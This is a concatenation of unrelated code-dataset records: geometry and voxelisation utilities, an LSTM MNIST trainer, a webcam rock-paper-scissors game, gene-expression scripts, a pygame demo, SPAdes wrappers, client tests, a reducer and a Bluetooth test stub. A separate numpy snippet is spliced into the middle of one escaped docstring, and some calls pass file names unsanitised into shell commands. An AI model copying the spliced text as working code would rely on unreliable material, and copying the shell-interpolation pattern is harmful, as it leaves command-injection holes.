`Images.get_width()`.\n :param height: The height of the screen in pixels. See output data `Images.get_height()`.\n :param near_plane: The near clipping plane. See command `set_camera_clipping_planes`. The default value in this function is the default value of the near clipping plane.\n :param far_plane: The far clipping plane. See command `set_camera_clipping_planes`. 
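# The pinhole unprojection used by Pixels2Camera above, on a toy grid:
# X = (Z/fx)*(u - x0), Y = (Z/fy)*(v - y0), with made-up intrinsics.
import numpy as np

u, v = np.meshgrid(np.arange(4.0), np.arange(4.0))
z = np.ones((4, 4))                  # fake depth map, 1 m everywhere
fx = fy = 2.0
x0 = y0 = 2.0                        # principal point at the grid centre
x = (z / fx) * (u - x0)
y = (z / fy) * (v - y0)
xyz = np.stack([x, y, z], axis=-1)   # (4, 4, 3) camera-space points
assert xyz.shape == (4, 4, 3)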
The default value in this function is the default value of the far clipping plane.\n :return An array of depth values.\n \"\"\"\n image = np.flip(np.reshape(image, (height, width, 3)), 1)\n\n # Convert the image to a 2D image array.\n if depth_pass == \"_depth\":\n depth_values = np.array((image[:, :, 0] + image[:, :, 1] / 256.0 + image[:, :, 2] / (256.0 ** 2)))\n elif depth_pass == \"_depth_simple\":\n depth_values = image[:, :, 0] / 256.0\n else:\n raise Exception(f\"Invalid depth pass: {depth_pass}\")\n # Un-normalize the depth values.\n return (depth_values * ((far_plane - near_plane) / 256.0)).astype(np.float32)\n\ndef depth2pointcloud(z, pix_T_cam):\n B, C, H, W = list(z.shape) # this is 1, 1, H, W\n y, x = utils_basic.meshgrid2D_py(H, W)\n y = np.repeat(y[np.newaxis, :, :], B, axis=0)\n x = np.repeat(x[np.newaxis, :, :], B, axis=0)\n z = np.reshape(z, [B, H, W])\n fx, fy, x0, y0 = split_intrinsics(pix_T_cam)\n xyz = Pixels2Camera(x, y, z, fx, fy, x0, y0)\n return xyz\n\n\ndef mesh_to_particles(mesh_filename, spacing=0.2, visualization=False, remove_outofbbox_pts=True):\n \"\"\"\n mesh_filename:\"/home/htung/Documents/2021/example_meshes/Rubber_duck.obj\"\n spacing: the size of the voxel grid in real-world scale # what is the distance between 2 particles\n \"\"\"\n\n # the output path used by binvox\n output_binvox_filename = mesh_filename.replace(\".obj\", \".binvox\")\n # check if output file exists\n assert not os.path.isfile(output_binvox_filename), f\"binvox file {output_binvox_filename} exists, please delete it first\"\n\n #load mesh\n mesh = as_mesh(trimesh.load_mesh(mesh_filename, process=True))\n # make the mesh transparent\n mesh_ori = copy.deepcopy(mesh) # for visualization\n mesh_ori.visual.face_colors[:,3] = 120\n\n\n\n edges = mesh.bounding_box.extents\n maxEdge = max(edges)\n meshLower0 = mesh.bounds[0,:]\n meshUpper0 = mesh.bounds[1,:]\n\n # shift the mesh to it is in some bounding box [0, +x], [0, +y], [0, +z]\n #mesh.vertices -= meshLower0\n\n\n edges = mesh.bounding_box.extents\n maxEdge = max(edges)\n meshLower = mesh.bounds[0,:]\n meshUpper = mesh.bounds[1,:]\n # tweak spacing to avoid edge cases for particles laying on the boundary\n # just covers the case where an edge is a whole multiple of the spacing.\n spacingEps = spacing*(1.0 - 1e-4)\n spacingEps_p = 0 #(9e-4) if spacing >= 0.001 else 0\n\n\n # naming is confusing, dx denotes the number of voxels in each dimension\n # make sure to have at least one particle in each dimension\n dx = 1 if spacing > edges[0] else int(edges[0]/spacingEps)\n dy = 1 if spacing > edges[1] else int(edges[1]/spacingEps)\n dz = 1 if spacing > edges[2] else int(edges[2]/spacingEps)\n\n maxDim = max(max(dx, dy), dz);\n\n #expand border by two voxels to ensure adequate sampling at edges\n # extending by a small offset to avoid point sitting exactly on the boundary\n meshLower_spaced = meshLower - 2.0 * spacing - spacingEps_p\n meshUpper_spaced = meshUpper + 2.0 * spacing + spacingEps_p\n\n maxDim_spaced = maxDim + 4\n\n voxelsize_limit = 512\n if maxDim_spaced > voxelsize_limit :\n print(meshLower_spaced)\n print(meshUpper_spaced)\n print(\"=====\")\n for dim in range(3):\n if edges[dim] < (voxelsize_limit - 4) * spacing:\n continue # short edge, no need to chunk\n else:\n amount_to_cut = edges[dim] - (voxelsize_limit - 4) * spacing\n meshLower_spaced[dim] += amount_to_cut * 0.5\n meshUpper_spaced[dim] -= amount_to_cut * 0.5\n maxDim_spaced = voxelsize_limit\n\n # we shift the voxelization bounds so that the voxel centers\n # lie 
symmetrically to the center of the object. this reduces the\n # chance of missing features, and also better aligns the particles\n # with the mesh\n # ex. |1|1|1|0.3| --> |0.15|1|1|0.15|\n meshOffset = np.zeros((3))\n meshOffset[0] = 0.5 * (spacing - (edges[0] - (dx-1)*spacing))\n meshOffset[1] = 0.5 * (spacing - (edges[1] - (dy-1)*spacing))\n meshOffset[2] = 0.5 * (spacing - (edges[2] - (dz-1)*spacing))\n meshLower_spaced -= meshOffset;\n\n # original space\n #meshLower_spaced += meshLower0\n meshUpper_spaced = meshLower_spaced + maxDim_spaced * spacing + 2 * spacingEps_p\n\n #print(meshLower_spaced, meshUpper_spaced)\n #print(f'binvox -aw -dc -d {maxDim_spaced} -pb -bb {meshLower_spaced[0]} {meshLower_spaced[1]} {meshLower_spaced[2]} {meshUpper_spaced[0]} {meshUpper_spaced[1]} {meshUpper_spaced[2]} -t binvox {mesh_filename}')\n\n # voxelsize_limit = 512\n # if maxDim_spaced > voxelsize_limit :\n # import ipdb; ipdb.set_trace()\n # cutting_space = spacing * (maxDim_spaced -voxelsize_limit ) * 0.5\n # maxDim_spaced = voxelsize_limit\n # meshLower_spaced += cutting_space\n # meshUpper_spaced -= cutting_space\n\n # import ipdb; ipdb.set_trace()\n\n\n os.system(f'binvox -aw -dc -d {maxDim_spaced} -pb -bb {meshLower_spaced[0]} {meshLower_spaced[1]} {meshLower_spaced[2]} {meshUpper_spaced[0]} {meshUpper_spaced[1]} {meshUpper_spaced[2]} -t binvox {mesh_filename}')\n #print(meshLower_spaced, meshUpper_spaced)\n\n # binvox -aw -dc -d 5 -pb -bb -0.9 -0.4 -0.9 0.9 1.4 0.9 -t binvox {mesh_filename}\n #os.system(f\"binvox -aw -dc -d 5 -pb -bb -0.9 -0.4 -0.9 0.9 1.4 0.9 -t binvox {mesh_filename}\")\n\n # convert voxel into points\n\n with open(output_binvox_filename, 'rb') as f:\n m1 = binvox_rw.read_as_3d_array(f)\n\n\n\n adjusted_spacing = (maxDim_spaced * spacing + 2 * spacingEps_p)/maxDim_spaced\n x, y, z = np.nonzero(m1.data)\n points = np.expand_dims(meshLower_spaced, 0) + np.stack([(x + 0.5)*adjusted_spacing, (y + 0.5)*adjusted_spacing, (z + 0.5)*adjusted_spacing], axis=1)\n os.remove(output_binvox_filename)\n\n\n if remove_outofbbox_pts:\n\n bbox = mesh_ori.bounds\n lower_bound = bbox[0, :]\n upper_bound = bbox[1, :]\n\n idx = (points[:, 0] - upper_bound[0] <= 0) * (points[:, 0] - lower_bound[0] >= 0)\n idy = (points[:, 1] - upper_bound[1] <= 0) * (points[:, 1] - lower_bound[1] >= 0)\n idz = (points[:, 2] - upper_bound[2] <= 0) * (points[:, 2] - lower_bound[2] >= 0)\n\n points = points[idx*idy*idz]\n\n if visualization:\n # for visualization\n axis = trimesh.creation.axis(axis_length=1)\n pcd = trimesh.PointCloud(points)\n (axis + mesh_ori).show()\n (trimesh.Scene(pcd) + axis).show()\n\n return points\n\n","sub_path":"net_utils/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":11347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"519442527","text":"import time\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# 设置GPU按需增长\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n# 用tensorflow 导入数据\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\nlr = 1e-3\ninput_size = 28 # 每个时刻输入的特征数量是28,即一行的数量\ntimestep_size = 28 # 28个时间时刻,即28行\nhidden_size = 256 # 隐含层的数量\nlayer_num = 2 # LSTMlayer层数\nclass_num = 10 # 最后输出的类别数目\ncell_type = 'lstm'\n\nX_input = tf.placeholder(tf.float32, [None, 784])\ny_input = tf.placeholder(tf.float32, [None, class_num])\nbatch_size = tf.placeholder(tf.int32, [])\nkeep_prob = tf.placeholder(tf.float32, 
[])\n\n# 搭建LSTM网络\n# **步骤1:RNN 的输入shape = (batch_size, timestep_size, input_size)\nX = tf.reshape(X_input, [-1, 28, 28])\n\n\n# ** 步骤2:创建 lstm 结构\ndef lstm_cell(cell_type, num_nodes, keep_prob):\n if cell_type == 'lstm':\n cell = tf.contrib.rnn.BasicLSTMCell(num_nodes)\n else:\n cell = tf.contrib.rnn.LSTMBlockCell(num_nodes)\n cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\n return cell\n\n\nmlstm_cell = tf.contrib.rnn.MultiRNNCell([lstm_cell(cell_type, hidden_size, keep_prob) for _ in range(layer_num)],\n state_is_tuple=True)\n# **步骤3:用全零来初始化state\ninit_state = mlstm_cell.zero_state(batch_size=batch_size, dtype=tf.float32)\n# **步骤4:方法一,调用 dynamic_rnn() 来让我们构建好的网络运行起来\n# ** 当 time_major==False 时, outputs.shape = [batch_size, timestep_size, hidden_size]\n# ** 所以,可以取 h_state = outputs[:, -1, :] 作为最后输出\n# ** state.shape = [layer_num, 2, batch_size, hidden_size],\n# ** 或者,可以取 h_state = state[-1][1] 作为最后输出\n# ** 最后输出维度是 [batch_size, hidden_size]\n# outputs, state = tf.nn.dynamic_rnn(mlstm_cell, inputs=X, initial_state=init_state, time_major=False)\n# h_state = state[-1][1]\n\n# # *************** 为了更好的理解 LSTM 工作原理,我们把上面 步骤6 中的函数自己来实现 ***************\n# # 通过查看文档你会发现, RNNCell 都提供了一个 __call__()函数,我们可以用它来展开实现LSTM按时间步迭代。\n# # **步骤4:方法二,按时间步展开计算\noutputs = list()\nstate = init_state\nwith tf.variable_scope('RNN'):\n for timestep in range(timestep_size):\n (cell_output, state) = mlstm_cell(X[:, timestep, :], state)\n outputs.append(cell_output)\nh_state = outputs[-1]\n\n# 上面 LSTM 部分的输出会是一个 [hidden_size] 的tensor,我们要分类的话,还需要接一个 softmax 层\n# 首先定义 softmax 的连接权重矩阵和偏置\n\n# 开始训练和测试\nW = tf.Variable(tf.truncated_normal([hidden_size, class_num], stddev=0.1), dtype=tf.float32)\nbias = tf.Variable(tf.constant(0.1, shape=[class_num]), dtype=tf.float32)\ny_pre = tf.nn.softmax(tf.matmul(h_state, W) + bias)\n\n# 损失和评估函数\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_input * tf.log(y_pre),axis=1))\ntrain_op = tf.train.AdamOptimizer(lr).minimize(cross_entropy)\n\ncorrect_prediction = tf.equal(tf.argmax(y_pre, 1), tf.argmax(y_input, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\nsess.run(tf.global_variables_initializer())\ncurrent = time.time()\nfor i in range(5000):\n _batch_size = 100\n X_batch, y_batch = mnist.train.next_batch(batch_size=_batch_size)\n cost, acc, _ = sess.run([cross_entropy, accuracy, train_op],\n feed_dict={X_input: X_batch, y_input: y_batch, keep_prob: 0.5, batch_size: _batch_size})\n if (i + 1) % 500 == 0:\n # 分 100 个batch 迭代\n test_acc = 0.0\n test_cost = 0.0\n N = 100\n for j in range(N):\n X_batch, y_batch = mnist.test.next_batch(batch_size=_batch_size)\n _cost, _acc = sess.run([cross_entropy, accuracy],\n feed_dict={X_input: X_batch, y_input: y_batch, keep_prob: 1.0,\n batch_size: _batch_size})\n test_acc += _acc\n test_cost += _cost\n print(\"step {}, train cost={:.6f}, acc={:.6f}; test cost={:.6f}, acc={:.6f}; pass {}s\".format(i + 1, cost, acc,\n test_cost / N,\n test_acc / N,\n time.time() - current))\n current = time.time()\n","sub_path":"RNN/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"432189528","text":"import json\nfrom os.path import join, dirname\nfrom os import environ\nfrom watson_developer_cloud import VisualRecognitionV3\n\nimport numpy as np\nimport cv2\nimport time\n\nimport sys\nimport time\n\nfrom random import randint\n\n'''\n'''\ndomain = [\"rock\", \"paper\", \"scissors\"]\nresult_p1_wins = 
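# A compact equivalent of the chained if/else in game_logic below: with
# rock=0, paper=1, scissors=2 (matching label_2_int), player 1 wins exactly
# when (p1 - p2) % 3 == 1.
def winner(p1, p2):
    return 0 if p1 == p2 else (1 if (p1 - p2) % 3 == 1 else 2)

assert winner(1, 0) == 1   # paper beats rock
assert winner(0, 2) == 1   # rock beats scissors
assert winner(2, 2) == 0   # draw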
\"Player 1 wins!\"\nresult_p2_wins = \"Player 2 wins!\"\n\n\ndef game_logic(player_1, player_2):\n if player_1 in domain and player_2 in domain:\n\n if player_1 == player_2:\n return (\"No winner!\")\n else:\n if player_1 == \"paper\":\n if player_2 == \"rock\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n\n if player_1 == \"rock\":\n if player_2 == \"scissors\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n\n if player_1 == \"scissors\":\n if player_2 == \"paper\":\n return (result_p1_wins)\n else:\n return (result_p2_wins)\n else:\n return (\"Random error\")\n\n\ndef label_2_int(lbl):\n return {\n 'rock': 0,\n 'paper': 1,\n 'scissors': 2\n }[lbl]\n\n\ndef int_2_label(nmbr):\n return {\n 0: 'rock',\n 1: 'paper',\n 2: 'scissors'\n }[nmbr]\n\n\ndef random_play():\n number = randint(0, len(domain) - 1)\n label = int_2_label(number)\n return label;\n\n\ndef play_series(player_1, player_2):\n player_1_wins = 0\n player_2_wins = 0\n for i in range(len(player_1)):\n result = game_logic(player_1[i], player_2[i])\n print(str(i) + ' | player 1: ' + player_1[i] + '\\t player 2: ' + player_2[i] + '\\t | ' + result)\n if (result == result_p1_wins):\n player_1_wins = player_1_wins + 1\n if (result == result_p2_wins):\n player_2_wins = player_2_wins + 1\n print('\\nplayer 1: ' + str(player_1_wins) + ' win(s)\\t player 2: ' + str(player_2_wins) + ' win(s)')\n\n\ndef play_game(player_1):\n player_2 = [random_play() for i in range(len(player_1))]\n play_series(player_1, player_2)\n\n'''\n'''\n\ncap = cv2.VideoCapture(0)\nwidth = 1080\ncv2.namedWindow(\"frame\", 0)\ncv2.resizeWindow(\"frame\", width, 768)\n\nimage_path_name = 'images/shot.png'\n\n\ndef recognize(image_path_name):\n visual_recognition = VisualRecognitionV3('2016-05-20', api_key='api-key') #replace api-key \n # print(json.dumps(visual_recognition.classify(images_file='SteinTest.jpg'), indent = 2))\n\n\n path = join(dirname(__file__), image_path_name)\n with open(path, 'rb') as images_file:\n results = visual_recognition.classify(images_file=images_file,\n classifier_ids=[\n 'SchereSteinPapier_1275869923'])\n\n return results\n\n\ndef log(j):\n j['images']\n\n# play_game(['scissors', 'rock', 'rock', 'rock', 'paper'])\n\ntr = {}\ntr['Stein'] = 'rock'\ntr['Schere'] = 'scissors'\ntr['Papier'] = 'paper'\n\nwhile (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('s'):\n ts = time.time()\n r = 1080.0 / frame.shape[1]\n dim = (1080, int(frame.shape[0] * r))\n\n # perform the actual resizing of the image and show it\n resized = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n\n cv2.imwrite(image_path_name, resized)\n\n results = recognize(image_path_name)\n\n # print(json.dumps(results, indent=2))\n\n if results['images'][0].get('classifiers'):\n res = results['images'][0]['classifiers'][0]['classes'][0]['class']\n player_1 = tr[res]\n play_game([player_1])\n else:\n print('Nix gefunden, kein Spiel möglich')\n # print(res)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n\n# image_name = 'SteinTest.jpg'\n# results = recognize(image_name)\n# print(json.dumps(results, indent=2))\n\n","sub_path":"RPS.py","file_name":"RPS.py","file_ext":"py","file_size_in_byte":4099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"503384494","text":"import numpy as np\nimport 
sklearn.preprocessing as SP\n\nfrom VisualisationMethods import ExpressionDifferencePlotting as EDP\nfrom DataExtraction import GeneDataExtraction as GDE, SkinDataExtraction as SDE, ProcessExtraction as PE\nfrom StatisticalAnalysisMethods import RelationTesting as RT, SignificanceExtraction as SE\n\n\"\"\"\nPsoriasis GSE13355 180 NN = Normal, PN = Non-Lesional, PP = Lesional\n GSE30999 170 No normal patients\n GSE34248 28 No normal patients\n GSE41662 48 No normal patients\n GSE78097 33 Different: Normal (0), Mild (1), Severe Psoriasis (2)\n GSE14905 82 \nAtopic dermatitis GSE32924 33 \n GSE27887 35 Different: Pre NL (0), Post NL (1), Pre L (2), Post L (3)\n GSE36842 39 Also tested difference between Acute (2) and Chronic (3) Dermatitis\n\n\"\"\"\n\ndata_names = ['GSE13355','GSE30999','GSE34248','GSE41662','GSE78097','GSE14905','GSE32924','GSE27887', 'GSE36842']\n\nsuitable_names = ['GSE13355','GSE30999','GSE34248','GSE41662','GSE14905']\n\n# Extract the data\nprint(\"Extracting data...\")\nsample_values, skin_type_values, gene_ids = SDE.extract_multiple_data_sets(suitable_names)\ngene_set = GDE.extract_gene_data()\n\n# Only use the significant values\nprint(\"Calculating significant values...\")\nsign_values, sign_skin_types, sign_gene_ids = SE.extract_significant_genes(sample_values, skin_type_values, gene_ids,\n target_groups=[1, 2], threshold=0.001,\n relation_groups='unequal variance', sorting=True)\n\n# Scale the values\nprint(\"Scaling the significant values...\")\nvalues = np.array(sign_values)\nscaler = SP.StandardScaler()\nstand_values = scaler.fit_transform(values)\n\ntesting = \"Process\"\n# testing = \"Cellular\"\n# testing = \"Molecular\"\n\n# Find all processes\nprint(\"Finding all %s relations...\" % testing)\nprocesses, process_genes = PE.extract_processes(sign_gene_ids, gene_set, relation_type=testing)\n\nfor process in processes:\n if \"response to oxidative stress\" in process:\n print(process)\n\n# Averaging results\nNL_avg = np.average(stand_values[:, :210], 1)\nL_avg = np.average(stand_values[:, 210:], 1)\n\n# Find significance between processes\nprint(\"Remove insignificant %s aspects...\" % testing)\nprocesses, sign_values = RT.remove_insignificant_processes(processes, process_genes, sign_gene_ids, L_avg, NL_avg,\n ordering=True, sign_threshold=0.01)\n\n# Plotting the division of processes\nprint(\"Plotting the different %s aspects...\" % testing)\nEDP.plot_multiple_processes(processes, process_genes, sign_gene_ids, L_avg, NL_avg, frame_size=3)","sub_path":"Testing/SkinDiseaseTesting/ProcessClustering.py","file_name":"ProcessClustering.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"386251241","text":"# 20K1026 日比野将己\n# 第12回-課題[2-2]\n# --------------------------\n# プログラム名: ex12-2-bouncing-2.py\n\nimport pygame # モジュールのインポート\n\nFPS = 60 # 毎秒のフレーム数\nLOOP = True # ループの判定\nGRAVITY = 0.5 # 重力\nd = 70 # ボールの大きさ\n\nRED = (255, 0, 0) # 黄色\nWHITE = (255, 255, 255) # 白\n\n\ndef draw_ball(screen, x, y, radius=10): # ボールの描写関数\n pygame.draw.circle(screen, RED, (x, y), radius) # ディスプレイに黄色で(x,y)に大きさ10の円を描写\n\n\nscreen = pygame.display.set_mode((700, 500)) # ディスプレイの生成\nscreen.fill(WHITE) # 背景色を白に\nimage = pygame.Surface((100, 100)) # 画像描写用の Surface(仮想画面)を生成\nbackground = pygame.image.load(\"hosei.jpg\") # 背景画像を読み込む\nbackground = pygame.transform.scale(background, (600, 400)) # 背景画像を縮小(判定が分かりやすいようにディスプレイより小さくした)\nball = pygame.image.load(\"eco.jpg\") # ボール画像を読み込む\nball = 
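# The per-frame physics of the bouncing loop below, in isolation: Euler
# integration with constant gravity and a damped reflection at the floor.
# Constants echo the loop's (GRAVITY=0.5, 400 px floor, 0.99 damping); the
# ball diameter offset is dropped for brevity.
def step(y, vy, gravity=0.5, floor=400, damping=0.99):
    vy += gravity            # accelerate downward
    y += vy                  # integrate position
    if y > floor:            # floor hit
        y = floor            # clamp so the ball does not sink in
        vy = -vy * damping   # reflect with a little energy loss
    return y, vy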
pygame.transform.scale(ball, (d, d)) # ボールを縮小\nball = ball.convert() # 画像を変換する\nball.set_colorkey(ball.get_at((0, 0))) # 左上の(0,0)を背景色に指定\nclock = pygame.time.Clock() # 時計オブジェクト(こいつで FPS の遅延をかける)\n\nx, y = (100, 100) # ボールの初期位置\nvx, vy = (5, 10) # ボールの速度x,y\n\nwhile LOOP: # 描写のループ\n for event in pygame.event.get(): # イベントが起こっ���ときに来る\n if event.type == pygame.QUIT: # もし閉じるボタンが押されたら\n LOOP = False # ループを終わる\n clock.tick(FPS) # 毎秒の呼び出し回数(フレームレート)\n x += vx # ボールのx座標移動\n vy += GRAVITY # 重力付加\n y += vy # ボールのy座標移動\n if not (0 <= x <= 600 - d): # もしディスプレイの左右内じゃなかったら\n vx = -vx # ボールを反射させる\n if not (0 <= y + d <= 400): # もしディスプレイの上下内じゃなかったら\n vy = -vy * 0.99 # ボールを反射させる\n y = 400 - d # ボールの下を背景画像の下にする(入り込み防止)\n # draw_ball(screen, x, y) # ボールの描写\n screen.blit(background, (0, 0)) # ディスプレイに背景画像を転送\n screen.blit(ball, (x, y)) # 背景画像上にボールを転送\n pygame.display.flip() # 描写の反映\n screen.fill(WHITE) # 塗りつぶし\n\npygame.quit() # 画面を閉じる\n","sub_path":"提出用/20K1026-日比野将己-ex12/ex12-2-bouncing-2.py","file_name":"ex12-2-bouncing-2.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"505604619","text":"from random import randint\n\n\ndef create_code(length = 4):\n global chars\n code_len = len(chars)\n code = ''\n for _ in range(length):\n index = randint(0, code_len - 1)\n code += chars[index]\n return code\n\n\ndef create_char():\n chars = []\n for char in range(65, 123):\n if char in range(91, 97):\n continue\n else:\n chars.append(chr(char))\n return [str(x) for x in range(10)] + chars\n\n\nif __name__ == '__main__':\n chars = create_char()\n code = create_code()\n print(code)\n","sub_path":"day-04/综合小练习/验证码.py","file_name":"验证码.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"295865337","text":"import os\nimport subprocess\nfrom copy import copy\n\ndef consensus(\n df_fusions,\n cwd,\n fastq_r1,\n fastq_r2\n ):\n '''\n fun runs subfunctions\n to extract reads supporting\n each fusion and then run\n spades.py to assembly the \n consensus sequence overlapping\n each fusion bp.\n\n paramenters:\n df_fusions=df of star fusion\n fastq_r1=sample r1 fastq file\n fastq_r2=sample r2 fastq file\n '''\n y = copy(df_fusions)\n \n f_r1_path = os.path.join(cwd, fastq_r1)\n f_r2_path = os.path.join(cwd, fastq_r2)\n\n y['bp_fastq'] = y.apply(\n extract_reads,\n r1=f_r1_path,\n r2=f_r2_path,\n axis=1\n )\n y['consensus'] = y.apply(\n assembly_reads,\n axis=1\n )\n return y\n\ndef extract_reads(\n row,\n r1,\n r2\n ):\n \"\"\"\n fun calls filterbyname.sh (bbmap)\n to extract read names from input\n file.\n\n paramenters:\n row = row from fusion df\n r1 = sample R1 pair-end FASTQ file\n r2 = sample R2 pair-end FASTQ file\n \"\"\"\n\n cwd = os.getcwd()\n ids_txt = row.read_ids_name\n ids_path = os.path.join(cwd, ids_txt)\n\n out_r1 = os.path.join(cwd, f\"{row.fusion_id}_r1.fastq\")\n out_r2 = os.path.join(cwd, f\"{row.fusion_id}_r2.fastq\")\n\n syscall = (\n f\"filterbyname.sh include=t in={r1} in2={r2} \"\n + f\"out={out_r1} out2={out_r2} names={ids_path}\"\n )\n\n subprocess.run(\n syscall,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True\n )\n\n return (out_r1, out_r2)\n\ndef assembly_reads(\n row\n ):\n \"\"\"\n fun calls spades.py and return\n assembled sequences or n.a.\n\n parameters:\n row=fusion df row\n input_r1=R1 pair-end read\n input_r2=R2 pair-end read\n \"\"\"\n input_r1, input_r2 = row.bp_fastq\n tmp_dir = 
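# The subprocess pattern used in make_consensus.py here (filterbyname.sh,
# spades.py): run a command and capture stdout/stderr. A list argv with the
# default shell=False avoids quoting pitfalls; 'echo' stands in for the real
# bioinformatics tools.
import subprocess

result = subprocess.run(['echo', 'hello'],
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert result.stdout.decode().strip() == 'hello'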
f'{row.fusion_id}_spades'\n\n syscall = f\"spades.py --rna -o {tmp_dir} -1 {input_r1} -2 {input_r2}\"\n subprocess.run(\n syscall,\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True,\n )\n\n cons_file = read_fasta(tmp_dir)\n return cons_file\n\ndef read_fasta(\n wd,\n fname=\"hard_filtered_transcripts.fasta\"\n ):\n \"\"\"\n fun reads fasta file and\n returns a list of contig\n sequences.\n \n parameters:\n wd = current working dir\n fname = spades.py sequences file name\n (harcoded)\n \"\"\"\n\n target = os.path.join(wd, fname)\n if os.path.exists(target):\n\n with open(target, \"r\") as fp:\n ifile = fp.read().split(\">\")\n #logging.debug(f\"total contigs in file: {len(ifile)}\")\n sequences = [\"\".join(seq.split(\"\\n\")[1:]) for seq in ifile if seq]\n else:\n #logging.debug(f\"total contigs in file: 0\")\n sequences = [\"n.a.\"]\n return sequences","sub_path":"get_contigs/make_consensus.py","file_name":"make_consensus.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"442676511","text":"from tsuruclient import client\n\nimport json\nimport httpretty\nimport unittest\n\n\nclass AppsTestCase(unittest.TestCase):\n def setUp(self):\n httpretty.enable()\n\n def tearDown(self):\n httpretty.disable()\n httpretty.reset()\n\n def test_list_apps(self):\n apps_data = []\n url = \"http://target/apps\"\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=json.dumps(apps_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n result = cl.apps.list()\n\n self.assertListEqual([], result)\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_get_app(self):\n app_data = {}\n url = \"http://target/apps/appname\"\n httpretty.register_uri(\n httpretty.GET,\n url,\n body=json.dumps(app_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n result = cl.apps.get(\"appname\")\n\n self.assertDictEqual({}, result)\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_remove_app(self):\n url = \"http://target/apps/appname\"\n httpretty.register_uri(\n httpretty.DELETE,\n url,\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n cl.apps.remove(\"appname\")\n\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n\n def test_create_app(self):\n app_data = {}\n url = \"http://target/apps\"\n httpretty.register_uri(\n httpretty.POST,\n url,\n body=json.dumps(app_data),\n status=200\n )\n\n cl = client.Client(\"http://target\", \"abc123\")\n data = {\n \"name\": \"appname\",\n \"framework\": \"framework\",\n }\n cl.apps.create(**data)\n\n self.assertEqual(\"bearer abc123\", httpretty.last_request().headers[\"authorization\"])\n","sub_path":"tests/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"354536028","text":"#!/usr/bin/python3\n\nimport sys\nimport csv\n\nd1={}\nfor tup in sys.stdin:\n\ttup=eval(tup)\n\tkeytup=(tup[0],tup[1])\n\tif keytup not in d1.keys() :\n\t\td1.setdefault(keytup,[])\n\t\td1[keytup].append(tup[2])\n\t\td1[keytup].append(int(tup[3]))\n\telse:\n\t\td1[keytup][0]+=tup[2]\n\t\td1[keytup][1]+=int(tup[3])\n\n\nfor key in list(d1):\n\tif(d1[key][0]<6):\n\t\td1.pop(key)\n\n\nl1=sorted(d1.items(),key= lambda k1 : k1[0][0])\n\nl1.sort(key= lambda k2 
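# The httpretty pattern the TestApps cases above follow: register a canned
# response for a URL, exercise the client, then assert on the request that
# was actually captured (shown here via requests instead of the tsuru
# client).
import json
import httpretty
import requests

httpretty.enable()
httpretty.register_uri(httpretty.GET, 'http://target/apps',
                       body=json.dumps([]), status=200)
resp = requests.get('http://target/apps',
                    headers={'authorization': 'bearer abc123'})
assert resp.json() == []
assert httpretty.last_request().headers['authorization'] == 'bearer abc123'
httpretty.disable()
httpretty.reset()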
: k2[1][0])\nl1.sort(key= lambda k3 : k3[1][1],reverse=True)\n\nfor i in l1:\n\tprint('%s,%s,%d,%d' % (i[0][0],i[0][1],i[1][1],i[1][0]))\n\t\n\t\t\t\n","sub_path":"adminmgr/media/code/python/red2/BD_212_945_952_reducer.py","file_name":"BD_212_945_952_reducer.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"601283279","text":"# TP/CON/SLA/BV-38-C [Slave Data Length Update - maximum Transmit Data Channel\n# PDU length and time]\n#\n# Verify that the IUT as Slave correctly handles reception of an LL_LENGTH_REQ\n# PDU when supporting greater than the minimum allowed values for Transmit Data\n# Channel PDU length and time\n\nimport bluetool\nfrom bluetool.core import HCIDataTransCoordinator, HCIDataTransWorker, LEHelper\nimport bluetool.bluez as bluez\nimport bluetool.command as btcmd\nimport bluetool.event as btevt\nimport bluetool.error as bterr\nfrom bluetool.utils import bytes2str, 